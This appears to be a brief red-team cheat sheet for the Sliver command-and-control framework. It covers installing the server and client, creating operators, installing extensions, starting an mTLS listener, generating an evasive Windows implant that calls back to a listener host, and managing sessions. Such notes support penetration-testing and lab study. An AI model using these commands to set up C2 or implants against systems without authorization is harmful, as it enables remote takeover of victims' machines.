C2 Servers
Quick Intro
SilverC2
Installation
Download the latest binaries from the releases
mv sliver-client_linux /usr/local/bin/silver-client
mv sliver-server_linux /usr/local/bin/silver-serverStarting the server
silver-serverGenerate an operator
new-operator --name <NAME> --lhost <IP> --lport <PORT>Enable Multiplayer
multiplayer
Copy the <PROFILE>.cfg to the `silver-client` configurations
cp zAbuQasem_10.10.15.87.cfg ~/.silver-client/configs
# OR
silver-client import ./zAbuQasem_10.10.15.87.cfgConnect to the server
# In a new terminal
silver-clientWorking with Extensions
Listing extensions
armoryInstalling all extensions
armory install allAliases usage: Make sure to use -- or '' before adding args ..etc
execute -- <COMMAND/OPTION>
execute '' <COMMAND/OPTION>Starting a listener
mtls --lhost <IP> --lport <PORT> [--persistent]
# http, https -> check help menu
Generate a Payload
generate --mtls <LHOST> --evasion --os=Windows --save=./abuqasem.exeWorking with sessions
List sessions
sessions
Interacting with a session
use <ID>
Last updated